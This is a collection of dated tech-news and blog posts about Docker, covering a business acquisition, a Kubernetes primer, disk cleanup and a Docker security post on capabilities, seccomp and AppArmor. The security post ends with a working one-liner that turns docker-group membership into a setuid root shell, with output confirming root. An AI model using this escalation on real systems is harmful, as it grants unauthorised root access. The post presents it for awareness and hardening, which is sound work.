Nov
13
2019
--

Mirantis acquires Docker Enterprise

Mirantis today announced that it has acquired Docker’s Enterprise business and team. Docker Enterprise was very much the heart of Docker’s product lineup, so this sale leaves Docker as a shell of its former, high-flying unicorn self. Docker itself, which installed a new CEO earlier this year, says it will continue to focus on tools that will advance developers’ workflows. Mirantis will keep the Docker Enterprise brand alive, though, which will surely not create any confusion.

With this deal, Mirantis is acquiring Docker Enterprise Technology Platform and all associated IP: Docker Enterprise Engine, Docker Trusted Registry, Docker Unified Control Plane and Docker CLI. It will also inherit all Docker Enterprise customers and contracts, as well as its strategic technology alliances and partner programs. Docker and Mirantis say they will both continue to work on the Docker platform’s open-source pieces.

The companies did not disclose the price of the acquisition, but it’s surely nowhere near Docker’s valuation during any of its last funding rounds. Indeed, it’s no secret that Docker’s fortunes changed quite a bit over the years, from leading the container revolution to becoming somewhat of an afterthought after Google open-sourced Kubernetes and the rest of the industry coalesced around it. It still had a healthy enterprise business, though, with plenty of large customers among the large enterprises. The company says about a third of Fortune 100 and a fifth of Global 500 companies use Docker Enterprise, which is a statistic most companies would love to be able to highlight — and which makes this sale a bit puzzling from Docker’s side, unless the company assumed that few of these customers were going to continue to bet on its technology.

Update: for reasons only known to Docker’s communications team, we weren’t told about this beforehand, but the company also today announced that it has raised a $35 million funding round from Benchmark. This doesn’t change the overall gist of the story below, but it does highlight the company’s new direction.

Here is what Docker itself had to say. “Docker is ushering in a new era with a return to our roots by focusing on advancing developers’ workflows when building, sharing and running modern applications. As part of this refocus, Mirantis announced it has acquired the Docker Enterprise platform business,” Docker said in a statement when asked about this change. “Moving forward, we will expand Docker Desktop and Docker Hub’s roles in the developer workflow for modern apps. Specifically, we are investing in expanding our cloud services to enable developers to quickly discover technologies for use when building applications, to easily share these apps with teammates and the community, and to run apps frictionlessly on any Kubernetes endpoint, whether locally or in the cloud.”

Mirantis itself, too, went through its ups and downs. While it started as a well-funded OpenStack distribution, today’s Mirantis focuses on offering a Kubernetes-centric on-premises cloud platform and application delivery. As the company’s CEO Adrian Ionel told me ahead of today’s announcement, today is possibly the most important day for the company.

So what will Mirantis do with Docker Enterprise? “Docker Enterprise is absolutely aligned and an accelerator of the direction that we were already on,” Ionel told me. “We were very much moving towards Kubernetes and containers aimed at multi-cloud and hybrid and edge use cases, with these goals to deliver a consistent experience to developers on any infrastructure anywhere — public clouds, hybrid clouds, multi-cloud and edge use cases — and make it very easy, on-demand, and remove any operational concerns or burdens for developers or infrastructure owners.”

Mirantis previously had about 450 employees. With this acquisition, it gains another 300 former Docker employees that it needs to integrate into its organization. Docker’s field marketing and sales teams will remain separate for some time, though, Ionel said, before they will be integrated. “Our most important goal is to create no disruptions for customers,” he noted. “So we’ll maintain an excellent customer experience, while at the same time bringing the teams together.”

This also means that for current Docker Enterprise customers, nothing will change in the near future. Mirantis says that it will accelerate the development of the product and merge its Kubernetes and lifecycle management technology into it. Over time, it will also offer a managed services solutions for Docker Enterprise.

While there is already some overlap between Mirantis’ and Docker Enterprise’s customer base, Mirantis will pick up about 700 new enterprise customers with this acquisition.

With this, Ionel argues, Mirantis is positioned to go up against large players like VMware and IBM/Red Hat. “We are the one real cloud-native player with meaningful scale to provide an alternative to them without lock-in into a legacy or existing technology stack.”

While this is clearly a day the Mirantis team is celebrating, it’s hard not to look at this as the end of an era for Docker, too. The company says it will share more about its future plans today, but didn’t make any spokespeople available ahead of this announcement.

Aug
27
2019
--

Kubernetes – Introduction to Containers

Kubernetes - Introduction to Containers

Kubernetes - Introduction to ContainersHere at Percona’s Training and Education department, we are always at work with trying to keep our materials up-to-date and relevant to current technologies.  In addition, we keep an eye out for what topics are “hot” and are generating a lot of buzz.  Unless you’ve been living under a rock for the past year, Kubernetes is the current buzz word/technology. This is the first post in this blog series where we will dive into Kubernetes, and explore using it with Percona XtraDB Cluster.

Editor Disclaimer: This post is not intended to convince you to switch to a containerized environment. This post is simply aimed to educate about a growing trend in the industry.

In The Beginning…

Let’s start at the beginning. First, there were hardware-based servers; we still have these today. Despite the prevalence of “the cloud”, many large companies still use private datacenters and run their databases and applications “the traditional way.” Stepping up from hardware we venture into virtual machine territory. Popular solutions here are VMWare (commercial product), QEMU, KVM, and Virtual Box (the latter three are OSS).

Virtual Machines (VM) abstract away the hardware on which they are running using emulation software; this is generally referred to as the hypervisor. Such a methodology allows for an entirely separate operating system (OS) to run “on top of” the OS running natively against the hardware. For example, you may have CentOS 7 running inside a VM, which in turn, is running on your Mac laptop, or you could have Windows 10 running inside a VM, which is running on your Ubuntu 18 desktop PC.

There are several nice things about using VMs in your infrastructure. One of those is the ability to move a VM from one server to another. Likewise, deploying 10 more VMs just like the first one is usually just a couple of clicks or a few commands. Another is a better utilization of hardware resources. If your servers have 8 CPU cores and 128GB of memory, running one application on that server might not fully utilize all that hardware. Instead, you could run multiple VMs on that one server, thus taking advantage of all the resources. Additionally, using a VM allows you to bundle your application, and all associated libraries, and configs into one “unit” that can be deployed and copied very easily (We’ll come back to this concept in a minute).

One of the major downsides of the VM solution is the fact that you have an entire, separate, OS running.  It is a huge waste of resources to run a CentOS 7 VM on top of a CentOS 7 hardware-server.  If you have 5 CentOS 7 VMs running, you have five separate linux kernels (in addition to the host kernel), five separate copies of /usr, and five separate copies of the same libraries and application code taking up precious memory. Some might say that, in this setup, 90-99% of each VM is duplicating efforts already being made by the base OS. Additionally, each VM is dealing with its own CPU context switching management. Also, what happens when one VM needs a bit more CPU than another? There exists the concept of CPU “stealing” where one VM can take CPU from another VM. Imagine if that was your critical DB that had CPU stolen!

What if you could eliminate all that duplication but still give your application the ability to be bundled and deployed across tens or hundreds of servers with just a few commands? Enter: containers.

What is a Container?

Simply put, a container is a type of “lightweight” virtual machine without all the overhead of running an independent operating system on top of a hypervisor. A container can be as small as a single line script or as large as <insert super complicated application with lots of libraries, code, images, etc.>.

With containers, you essentially get all of the “pros” surrounding VMs with a lot less “cons,” mainly in the area of performance. A container is not an emulation, like VMs. On Linux, the kernel provides control groups (cgroups) functionality, which can limit and isolate CPU, memory, disk, and network. This action of isolation becomes the container; everything needed is ‘contained’ in one place/group. In more advanced setups, these cgroups can even limit/throttle the number of resources given to each container. With containers, there is no need for an additional OS install; no emulation, no hypervisor. Because of this, you can achieve “near bare-metal performance” while using containers.

Containers, and any applications running inside the containers, run inside their own, isolated, namespace, and thus, a container can only see its own process, disk contents, devices assigned, and granted network access.

Much like VMs, containers can be started, stopped, and copied from machine to machine, making deployment of applications across hundreds of servers quite easy.

One potential downside to containers is that they are inherently stateless. This means that if you have a running container, and make a change to its configuration or update a library, etc., that state is not saved if the container is restarted. The initial state of the launched container will be restored on restart. That said, most container implementations provide a method for supplying external storage which can hold stateful information to survive a restart or redeployment.

Dock the Ship, Capt’n

The concept of “containers” is generic. Many different implementations of containers exist, much like different distributions of Linux. The most popular implementation of containers in the Linux space is Docker. Docker is free, open-source software, but can also be sold with a commercial license for more advanced features. Docker is built upon one of the earlier linux container implementations, LXC.

Docker uses the concept of “images” to distribute containers. For example, you can download and install the Percona MySQL 8.0 image to your server, and from that image, create as many separate, independent containers of ‘Percona MySQL 8’ as your hardware can handle. Without getting too deep into the specifics, Docker images are the end result of multiple compressed layers which were used during the building process of this image. Herein lies another pro for Docker. If multiple images share common layers, there only needs to be one copy of that layer on any system, thus the potential for space savings can be huge.

Another nice feature of Docker containers is its built-in versioning capabilities. If you are familiar with the version control software Git, then you should know the concept of “tags” which is extremely similar to Docker tags. These tags allow you to track and specify Docker images when creating and deploying images. For example, using the same image (

percona/percona-server

 ), you can deploy

percona/percona-server:5.7

  or

percona/percona-server:8.0

  In this example, “5.7” and “8.0” are the tags used.

Docker also has a huge community ecosystem for sharing images. Visit https://hub.docker.com/ and search for just about any popular OSS project and you will probably find out that someone has already created an image for you to utilize.

Too Many Ships at Port

Docker containers are extremely simple to maintain, deploy, and use within your infrastructure. But what happens when you have hundreds of servers, and you’re trying to manage thousands of docker containers? Sure, if one server goes down, all you need to do, technically speaking, is re-launch those downed containers on another server. Do you have another server in your sea of servers with enough free capacity to handle this additional load? What if you were using persistent storage and need that volume moved along with the container? Running and managing large installations of containers can quickly become overwhelming.

Now we will discuss the topic of container orchestration.

Kubernetes

Pronounced, koo-ber-net-ies, and often abbreviated K8S (there are 8 letters between the ‘K’ and last ‘S’), is the current mainstream project for managing Docker containers at very large scale.  Kubernetes is Greek for “governor”, “helmsman”, or “captain”. Rather than repeating it here, you can read more about the history of K8S on your own.

Terminology

K8S has many moving parts to itself, as you might have imagined. Take a look at this image.

Kubernetes

Source: Wikipedia (modified)

Nodes

At the bottom of the image are two ‘Kubernetes Nodes’. These are usually your physical hardware servers, but could also be VMs at your cloud provider. These nodes will have a minimum OS installed, along with other necessary packages like K8S and Docker.

Kubelet is a management binary used by K8S to watch existing containers, run health checks, and launch new containers.

Kube-proxy is a simple port-mapping proxy service. Let’s say you had a simple webserver running as a container on 172.14.11.109:34223. Your end-users would access an external/public IP over 443 like normal, and kube-proxy would map/route that external access to the correct internal container.

Pods

The next concept to understand is a pod. This is typically the base term used when discussing what is running on a node. A pod can be a single container or can be an entire setup, running multiple containers, with mapped external storage, that should be grouped together as a single unit.

Networking

Networking within K8S is a complex topic, and a deep discussion is not suitable for this post. At an entry-level, what you need to know is that K8S creates an “overlay” network, allowing a container in a pod on node1 to talk to a container in a pod on node322 which is in another datacenter. Should your company policy require it, you can create multiple overlay networks across your entire K8S and use them as a way to isolate traffic between pods (ie: think old-school VLANs).

Master Node

At the top of the diagram, you can see the developer/operator interacting with the K8S master node. This node runs several processes which are critical to K8S operation:

kube-apiserver: A simple server to handle/route/process API requests from other K8S tools and even your own custom tools

etcd: A highly available key-value store. This is where K8S stores all of its stateful data.

kube-scheduler: Manages inventory and decides where to launch new pods based on available node resources.

You might have noticed that there is only 1 master node in the above diagram. This is the default installation. This is not highly available and should the master node go down, the entire K8S infrastructure will go down with it. In a true production environment, it is highly recommended that you run the master node in a highly-available manner.

Wrap It Up

In this post, we discussed how traditional hardware-based setups have been slowly migrating, first towards virtual machine setups and now to containerized deployments. We brought up the issues surrounding managing large container environments and introduced the leading container orchestration platform, Kubernetes. Lastly, we dove into K8S’s various components and architecture.

Once you have your K8S cluster set up with a master node, and many worker nodes, you’ll finally be able to launch some pods and have services accessible. This is what we will do in part 2 of this blog series.

Aug
21
2019
--

Cleaning Docker Disk Space Usage

Cleaning Docker Disk Space Usage

Cleaning Docker Disk Space UsageWhile testing our PMM2 Beta and other Dockerized applications, you may want to clean up your docker install and start from scratch. If you’re not very familiar with Docker it may not be that trivial. This post focuses on cleaning up everything in docker so you can “start from scratch” which means removing all your containers and their data. Make sure this is what you really want!

First, you have running (and stopped containers):

root@pmm2-test:~# docker ps -a
CONTAINER ID        IMAGE                               COMMAND                CREATED             STATUS              PORTS                                      NAMES
810fef9a2a05        perconalab/pmm-server:2.0.0-beta5   "/opt/entrypoint.sh"   2 weeks ago         Up 2 weeks          0.0.0.0:80->80/tcp, 0.0.0.0:443->443/tcp   pmm-server-2.0.0-beta5
7e2595b2b7ad        perconalab/pmm-server:2.0.0-beta5   "/bin/true"            2 weeks ago         Created                                                        pmm-data-2-0-0-beta5

Which you can stop and remove.

root@pmm2-test:~# docker stop $(docker ps -a -q) && docker rm $(docker ps -a -q)
810fef9a2a05
7e2595b2b7ad
810fef9a2a05
7e2595b2b7ad

You may feel like you are done at this point, but not really. You may have a lot of disk space held up in other Docker objects:

root@pmm2-test:~# docker system df
TYPE                TOTAL               ACTIVE              SIZE                RECLAIMABLE
Images              1                   0                   1.331GB             1.331GB (100%)
Containers          0                   0                   0B                  0B
Local Volumes       1                   0                   52.61GB             52.61GB (100%)
Build Cache         0                   0                   0B                  0B

Now we can see that we have about 1GB still held up in images and the larger amount of 52GB in local volumes. To clean these up, we want to see their names, which you can do with the same “df” command:

root@pmm2-test:~# docker system df -v
Images space usage:

REPOSITORY              TAG                 IMAGE ID            CREATED             SIZE                SHARED SIZE         UNIQUE SIZE         CONTAINERS
perconalab/pmm-server   2.0.0-beta5         9b3111808907        2 weeks ago         1.331GB             0B                  1.331GB             0

Containers space usage:

CONTAINER ID        IMAGE               COMMAND             LOCAL VOLUMES       SIZE                CREATED             STATUS              NAMES

Local Volumes space usage:

VOLUME NAME                                                        LINKS               SIZE
a3e9e89f3c43bdaa817e014d08e73705562a9affe4dae54817d77a1b8ad0c771   0                   52.61GB

Build cache usage: 0B

CACHE ID            CACHE TYPE          SIZE                CREATED             LAST USED           USAGE               SHARED

From here you can, of course, remove volumes and images one by one, but you may choose to do this instead:

Remove All Docker Images:

root@pmm2-test:~# docker image prune -a -f
Deleted Images:
untagged: perconalab/pmm-server:2.0.0-beta5
untagged: perconalab/pmm-server@sha256:55968571b01e1f2b02cee77ef92afa05f93c1a0b8e506ceebc10d03bff9783be
deleted: sha256:9b3111808907a3cd02d4961b114471c8ec16dc0dc430cfd8c4a4f556804e57ec
deleted: sha256:4cb3b12fc91c29837374de51f6279d911c9e21d73d22a009841ac9a00e6a7e96
deleted: sha256:d69483a6face4499acb974449d1303591fcbb5cdce5420f36f8a6607bda11854

Total reclaimed space: 1.331GB

And Remove all Docker Local Volumes:

root@pmm2-test:~#  docker system prune --volumes -f
Deleted Volumes:
a3e9e89f3c43bdaa817e014d08e73705562a9affe4dae54817d77a1b8ad0c771

Total reclaimed space: 52.61GB

We can run “docker system df” again to see if we really cleaned up everything or if anything else remains:

root@pmm2-test:~# docker system df
TYPE                TOTAL               ACTIVE              SIZE                RECLAIMABLE
Images              0                   0                   0B                  0B
Containers          0                   0                   0B                  0B
Local Volumes       0                   0                   0B                  0B
Build Cache         0                   0                   0B                  0B

All clear. We can now have a fresh start with docker!

Jul
11
2019
--

Docker Security Considerations Part I

Docker security

Docker securityDocker Security Considerations – PART I

Why Docker Security Matters

It is a fact that Docker has found widespread use during the past years, mostly because it is very easy to use as well as fast and easy to deploy when compared with a full-blown virtual machine. More and more servers are being operated as Docker hosts on which micro-services run in containers. From a security point of view, two aspects of it arise in the context of this blog post and the inherent limitations it has as a means of communication.

First, the answer to the already quite talked-through question, “Is it secure?” Second, the less analyzed aspect of incident analysis, and the changes introduced with respect to known methods and evidence. In order to answer the first question, some key facts about Docker need to be noted. The second aspect, being less examined in general, will be a future post in this mini-series about Docker security.

The basic technology that enables containers in Linux is kernel name-spaces. These are what allow the kernel to offer private resources to a process, while hiding the resources of other processes, all without actually creating full guest OSes or kernels per process. One very important fact is that containers run without cgroup limitations by default, but CPU and memory usage can be easily constrained with the application of a few flags. Docker presents an option called cgroup-parent for this purpose, and you can check the official docker documentation on cgroup-parent. Under no circumstances should containers (or any process) be allowed to run on a production server without such cgroup limitations. In addition, predefined resource consumption for containers could help in limiting the costs for cloud infrastructure as it better defines them, leading to more targeted purchases.

Docker uses a default profile to create a system call whitelist. In this profile, “dangerous” syscalls are missing. If you have a solid understanding of exactly the system calls needed by your containerized process, you can customize this profile or write your own to lock out every syscall not needed by your container. Also, note that custom profiles can be applied on a container-by-container basis. In addition, Linux capabilities can be a very good way with regards to considerations on Docker security. Quoting from the man-pages:

For the purpose of performing permission checks, traditional UNIX implementations distinguish two categories of processes: privileged processes (whose effective user ID is 0, referred to as superuser or root), and unprivileged processes (whose effective UID is nonzero). Privileged processes bypass all kernel permission checks, while unprivileged processes are subject to full permission checking based on the process’s credentials (usually: effective UID, effective GID, and supplementary group list).

Starting with kernel 2.2, Linux divides the privileges traditionally associated with superuser into distinct units, known as capabilities, which can be independently enabled and disabled.  Capabilities are a per-thread attribute.

In the example below, we can see the basic syntax for manipulating and auditing capabilities. Perhaps the most secure way to run Docker is using the –user flag (no capabilities), but this is not always possible since there is no way to add capabilities to a nonzero UID. In cases where this is needed, running as root with –cap-drop ALL and –cap-add to add back the minimum set of capabilities is the most secure practical configuration. Note that since a Docker container is fundamentally just a process, it’s simple to enforce these permissions at runtime using the native Linux functionality designed to manage capabilities per process. No ‘under-the-hood’ configuration inside the container is required, but it would be to manipulate the capabilities of groups of processes running in a VM.

A closer look at these should highlight the need to manage them and will give us a better understanding of what’s going on. The default list of capabilities available to privileged processes in a docker container (mostly quoting https://www.redhat.com/en/blog/secure-your-containers-one-weird-trick) is presented below. A complete list of capabilities can be found at the following link http://man7.org/linux/man-pages/man7/capabilities.7.html. At this point we should note that in Dockerfile v3 and above, capabilities can be added and images built; e.g.

cap_drop:

- ALL

cap_add:

- chown

The default list of capabilities available in a Docker container:

chown:

This is described as the ability to make arbitrary changes to file UIDs and GIDs. Unless a shell is running inside a container and packages installed into it, this should be dropped. If chown is needed, allow it, do the work, and then drop it again.

dac_override:

(Discretionary access control)_override.

Man pages state that this cap allows root to bypass file r, w & x permissions. It is as odd as it sounds, that any app will need this. As noted by RedHat sec experts “nothing should need this. If your container needs this, it probably doing something horrible.”

fowner:

fowner transfers the ability to bypass permission checks on operations that normally require the file system UID to match the UID of the file. Quite similar to dac_overide. Could be needed for docker build but it should be dropped when the container is in production.

fsetid:

Quoting the man page “don’t clear set-user-ID and set-group-ID mode bits when a file is modified; set the set-group-ID bit for a file whose GID does not match the file system or any of the supplementary GIDs of the calling process.”

So, if you are not running an installation, you probably do not need this capability.

kill

This capability basically means that a root-owned process can send kill signals to non-root processes. If your container is running all processes as root or the root processes never kills processes running as non-root, you do not need this capability. If you are running systemd as PID 1 inside of a container, and you want to stop a container running with a different UID, you might need this capability.

setgid

In short, a process with this capability can change its GID to any other GID. Basically allows full group access to all files on the system. If your container processes do not change UIDs/GIDs, they do not need this capability.

setuid

A process with this capability can change its UID to any other UID. Basically, it allows full access to all files on the system. If your container processes do not change UIDs/GIDs always running as the same UID, preferably non-root, they do not need this capability. Applications that need setuid usually start as root in order to bind to ports below 1024 and then change their UIDS and drop capabilities. Apache binding to port 80 requires net_bind_service, usually starting as root. It then needs setuid/setgid to switch to the apache user and drop capabilities. Most containers can safely drop setuid/setgid capability.

setpcap

From the man page description: “Add any capability from the calling thread’s bounding set to its inheritable set; drop capabilities from the bounding set (via prctl(2) PR_CAPBSET_DROP); make changes to the securebits flags.”

A process with this capability can change its current capability set within its bounding set. Meaning a process could drop capabilities or add capabilities if it did not currently have them, but is limited by the bounding set capabilities.

net_bind_service

If you have this capability, you can bind to privileged ports (< 1024).

When binding to a port below 1024 is needed, this capability will do the job. For services that listen to a port above 1024, this capability should be dropped. The risk of this capability is a rogue process interpreting a service like sshd, and collecting user passwords. Running a container in a different network namespace reduces the risk of this capability. It would be difficult for the container process to get to the public network interface

net_raw

This access allows a process to spy on packets on its network. Most container processes would not need this access so it probably should be dropped. Note this would only affect the containers that share the same network that your container process is running on, usually preventing access to the real network. RAW sockets also give an attacker the ability to inject almost anything onto the network.

sys_chroot

This capability allows the use of chroot(). In other words, it allows your processes to chroot into a different rootfs. chroot is probably not used within your container, so it should be dropped.

mknod

If you have this capability, you can create special files using mknod.

This allows your processes to create device nodes. Containers are usually provided all of the device nodes they need in /dev, so this could and should be dropped by default. Almost no containers ever do this, and even fewer containers should do this.

audit_write

With this capability, you can write a message to the kernel auditing log. Few processes attempt to write to the audit log (login programs, su, sudo) and processes inside of the container are probably not trusted. The audit subsystem is not currently namespace-aware, so this should be dropped by default.

setfcap

Finally, the setfcap capability allows you to set file capabilities on a file system. Might be needed for doing installs during builds, but in production, it should probably be dropped.

The following exercise, the output of which is displayed below, should highlight the way of manipulating capabilities along with some of the points made above.

First, we run a container that changes ownership of the root fs:

Status: Image is up to date for centos:latest
john@seceng:~/Documents/docker-sec$
john@seceng:~/Documents/docker-sec$ docker container run --rm centos:latest chown nobody /
john@seceng:~/Documents/docker-sec$

We can see that the root user is able to execute this without a problem.

Next, we drop all capabilities from the user in the container, and when we try running the above command again, we can see it fails, as the user no longer has the necessary chown capability (or any other root capabilities):

john@seceng:~/Documents/docker-sec$ docker container run --rm --cap-drop all centos:latest chown nobody /
chown: changing ownership of '/': Operation not permitted
john@seceng:~/Documents/docker-sec$

Now we add the necessary capability back in:

john@seceng:~/Documents/docker-sec$ docker container run --rm --cap-drop all --cap-add chown centos:latest chown nobody /
john@seceng:~/Documents/docker-sec$

Dropping all capabilities and adding back only the required ones makes for the most secure containers. An attacker who breaches this container won’t have any root capabilities except chown.

Now, if we try adding chown to a non-root user, the operation fails since capabilities manipulation won’t grant additional capabilities under any circumstances to a process run by a non-root user, as noted on the following screenshot.

john@seceng:~/Documents/docker-sec$ docker container run --rm --user 1000:1000 --cap-add chown centos:latest chown nobody /
chown: changing ownership of '/': Operation not permitted
john@seceng:~/Documents/docker-sec$

Another Linux feature that can aid the process of securing our containers is Secure computing mode (seccomp). Seccomp is a Linux kernel feature. You can use it to restrict the actions available within the container. The seccomp() system call operates on the seccomp state of the calling process. You can use this feature to restrict your application’s access.

This feature is available only if Docker has been built with seccomp and the kernel is configured with CONFIG_SECCOMP enabled. More info about the seccomp profiles for Docker can be found here. To check if your kernel supports seccomp:

john@seceng:~/Documents/docker-sec$ grep CONFIG_SECCOMP= /boot/config-$(uname -r)
CONFIG_SECCOMP=y
john@seceng:~/Documents/docker-sec$

While capabilities and seccomp allow restricting access to root capabilities and system calls, SELinux goes a step further and helps protect the file system of the host from malicious code. Default SELinux labels restrict access to directories and those labels can be changed by the :z and :Z flags when mounting directories to relabel those directories for sharing or private use by containers, respectively.

Additionally, AppArmor (Application Armor) is a Linux security module that protects an operating system and its applications from security threats. To use it, a system administrator associates an AppArmor security profile with each program. Docker expects to find an AppArmor policy loaded and enforced. Docker automatically generates and loads a default profile for containers named docker-default. On Docker versions 1.13.0 and later, the Docker binary generates this profile in tmpfs and then loads it into the kernel. On Docker versions earlier than 1.13.0, this profile is generated in /etc/apparmor.d/docker instead. It should be noted, though, that this profile is used on containers, not on the Docker daemon. More on AppArmor and Docker can be found at docker’s official documentation.

Last in this list of facts, but certainly not in general, is the default software-defined network firewalling imposed by Docker, and the iptables rules automatically managed by Docker. The Docker Networking Model was designed around software-defined networks exactly so that Docker could easily manage iptables firewall rules on create and destroy operations of Docker networks and containers. Rather than writing complicated iptables rules explicitly, effective firewalling can be imposed on a containerized data center simply by designing and declaring a sensible software-defined network topology.

Basically, but for sure not limited to, Docker Security considerations rise because the Docker daemon runs as root and is being used widely in production systems. Having said that and taking into account the previously mentioned facts, one can easily understand that configuration, bugs, vulnerabilities or other security issues are of high risk and impact factor. With this in mind, the following example, which highlights the non-secure default configuration of Docker, is probably the best “teaser” for the next part of this post, in which we will cover some recent vulnerabilities and their mitigation.

john@seceng:~/Documents/docker-sec$ id

uid=1000(john) gid=1000(john) groups=1000(john),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),998(docker)
john@seceng:~/Documents/docker-sec$ whoami

john
john@seceng:~/Documents/docker-sec$ docker run -v /home/${user}:/h_docs ubuntu bash -c "cp /bin/bash /h_docs/rootshell && chmod 4777 /h_docs/rootshell;" && ~/rootshell -p

rootshell-4.4# id
uid=1000(john) gid=1000(john) euid=0(root) groups=1000(john),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),108(netdev),998(docker)
rootshell-4.4# whoami

root
rootshell-4.4# uname -a

Linux seceng 4.19.0-5-amd64 #1 SMP Debian 4.19.37-5 (2019-06-19) x86_64 GNU/Linux
rootshell-4.4# exit

exit
john@seceng:~/Documents/docker-sec$

 

From user to root, in one line. It’s there by default.

John Lionis, Security Engineer | Percona LLC

Written by in: Docker,Zend Developer | Tags:
May
21
2019
--

Microsoft makes a push for service mesh interoperability

Services meshes. They are the hot new thing in the cloud native computing world. At KubeCon, the bi-annual festival of all things cloud native, Microsoft today announced that it is teaming up with a number of companies in this space to create a generic service mesh interface. This will make it easier for developers to adopt the concept without locking them into a specific technology.

In a world where the number of network endpoints continues to increase as developers launch new micro-services, containers and other systems at a rapid clip, they are making the network smarter again by handling encryption, traffic management and other functions so that the actual applications don’t have to worry about that. With a number of competing service mesh technologies, though, including the likes of Istio and Linkerd, developers currently have to choose which one of these to support.

“I’m really thrilled to see that we were able to pull together a pretty broad consortium of folks from across the industry to help us drive some interoperability in the service mesh space,” Gabe Monroy, Microsoft’s lead product manager for containers and the former CTO of Deis, told me. “This is obviously hot technology — and for good reasons. The cloud-native ecosystem is driving the need for smarter networks and smarter pipes and service mesh technology provides answers.”

The partners here include Buoyant, HashiCorp, Solo.io, Red Hat, AspenMesh, Weaveworks, Docker, Rancher, Pivotal, Kinvolk and VMware . That’s a pretty broad coalition, though it notably doesn’t include cloud heavyweights like Google, the company behind Istio, and AWS.

“In a rapidly evolving ecosystem, having a set of common standards is critical to preserving the best possible end-user experience,” said Idit Levine, founder and CEO of Solo.io. “This was the vision behind SuperGloo — to create an abstraction layer for consistency across different meshes, which led us to the release of Service Mesh Hub last week. We are excited to see service mesh adoption evolve into an industry-level initiative with the SMI specification.”

For the time being, the interoperability features focus on traffic policy, telemetry and traffic management. Monroy argues that these are the most pressing problems right now. He also stressed that this common interface still allows the different service mesh tools to innovate and that developers can always work directly with their APIs when needed. He also stressed that the Service Mesh Interface (SMI), as this new specification is called, does not provide any of its own implementations of these features. It only defines a common set of APIs.

Currently, the most well-known service mesh is probably Istio, which Google, IBM and Lyft launched about two years ago. SMI may just bring a bit more competition to this market since it will allow developers to bet on the overall idea of a service mesh instead of a specific implementation.

In addition to SMI, Microsoft also today announced a couple of other updates around its cloud-native and Kubernetes services. It announced the first alpha of the Helm 3 package manager, for example, as well as the 1.0 release of its Kubernetes extension for Visual Studio Code and the general availability of its AKS virtual nodes, using the open source Virtual Kubelet project.

May
08
2019
--

Steve Singh stepping down as Docker CEO

TechCrunch has learned that Docker CEO Steve Singh will be stepping down after two years at the helm, and former Hortonworks CEO Rob Bearden will be taking over. An email announcement went out this morning to Docker employees.

People close to the company confirmed that Singh will be leaving the CEO position, staying on the job for several months to help Bearden with the transition. He will then remain with the organization in his role as chairman of the board. They indicated that Bearden has been working closely with Singh over the last several months as a candidate to join the board and as a consultant to the executive team.

Singh clicked with him and viewed him as a possible successor, especially given his background with leadership positions at several open-source companies, including taking Hortonworks public before selling to Cloudera last year. Singh apparently saw someone who could take the company to the next level as he moved on. As one person put it, he was tired of working 75 hours a week, but he wanted to leave the company in the hands of a capable steward.

Last week in an interview at DockerCon, the company’s annual customer conference in San Francisco, Singh appeared tired, but a leader who was confident in his position and who saw a bright future for his company. He spoke openly about his leadership philosophy and his efforts to lift the company from the doldrums it was in when he took over two years prior, helping transform it from a mostly free open-source offering into a revenue-generating company with 750 paying enterprise customers.

In fact, he told me that under his leadership the company was on track to become free cash flow positive by the end of this fiscal year, a step he said would mean that Docker would no longer need to seek outside capital. He even talked of the company eventually going public.

Apparently, he felt it was time to pass the torch before the company took those steps, saw a suitable successor in Bearden and offered him the position. While it might have made more sense to announce this at DockerCon with the spotlight focused on the company, it was not a done deal yet by the time the conference was underway in San Francisco, people close to the company explained.

Docker took a $92 million investment last year, which some saw as a sign of continuing struggles for the company, but Singh said he took the money to continue to invest in building revenue-generating enterprise products, some of which were announced at DockerCon last week. He indicated that the company would likely not require any additional investment moving forward.

As for Bearden, he is an experienced executive with a history of successful exits. In addition to his experience at Hortonworks, he was COO at SpringSource, a developer tool suite that was sold to VMware for $420 million in 2009 (and is now part of Pivotal). He was also COO at JBoss, an open-source middleware company acquired by Red Hat in 2006.

Whether he will do the same with Docker remains to be seen, but as the new CEO, it will be up to him to guide the company moving forward to the next steps in its evolution, whether that eventually results in a sale or the IPO that Singh alluded to.

Email to staff from Steve Singh:

Note: Docker has now confirmed this story in a press release.

Apr
30
2019
--

Docker looks to partners and packages to ease container implementation

Docker appears to be searching for ways to simplify the core value proposition of the company — creating, deploying and managing containers. While most would agree it has revolutionized software development, like many technology solutions, it takes a certain level of expertise and staffing to pull off. At DockerCon, the company’s customer conference taking place this week in San Francisco, Docker announced several ways it could help customers with the tough parts of implementing a containerized solution.

For starters, the company announced a beta of Docker Enterprise 3.0 this morning. That update is all about making life simpler for developers. As companies move to containerized environments, it’s a challenge for all but the largest organizations like Google, Amazon and Facebook, all of whom have massive resource requirements and correspondingly large engineering teams.

Most companies don’t have that luxury though, and Docker recognizes if it wants to bring containerization to a larger number of customers, it has to create packages and programs that make it easier to implement.

Docker Enterprise 3.0 is a step toward providing a solution that lets developers concentrate on the development aspects, while working with templates and other tools to simplify the deployment and management side of things.

The company sees customers struggling with implementation and how to configure and build a containerized workflow, so it is working with systems integrators to help smooth out the difficult parts. Today, the company announced Docker Enterprise as a Service, with the goal of helping companies through the process of setting up and managing a containerized environment, using the Docker stack and adjacent tooling like Kubernetes.

The service provider will take care of operational details like managing upgrades, rolling out patches, doing backups and undertaking capacity planning — all of those operational tasks that require a high level of knowledge around enterprise container stacks.

Capgemini will be the first go-to-market partner. “Capgemini has a combination of automation, technology tools, as well as services on the back end that can manage the installation, provisioning and management of the enterprise platform itself in cases where customers don’t want to do that, and they want to pay someone to do that for them,” Scott Johnston, chief product officer at Docker told TechCrunch.

The company has released tools in the past to help customers move legacy applications into containers without a lot of fuss. Today, the company announced a solution bundle called Accelerate Greenfield, a set of tools designed to help customers get up and running as container-first development companies.

“This is for those organizations that may be a little further along. They’ve gone all-in on containers committing to taking a container-first approach to new application development,” Johnston explained. He says this could be cloud native microservices or even a LAMP stack application, but the point is that they want to put everything in containers on a container platform.

Accelerate Greenfield is designed to do that. “They get the benefits where they know that from the developer to the production end point, it’s secure. They have a single way to define it all the way through the life cycle. They can make sure that it’s moving quickly, and they have that portability built into the container format, so they can deploy [wherever they wish],” he said.

These programs and products are all about providing a level of hand-holding, either by playing a direct consultative role, working with a systems integrator or providing a set of tools and technologies to walk the customer through the containerization life cycle. Whether they provide a sufficient level of help that customers require is something we will learn over time as these programs mature.

Apr
30
2019
--

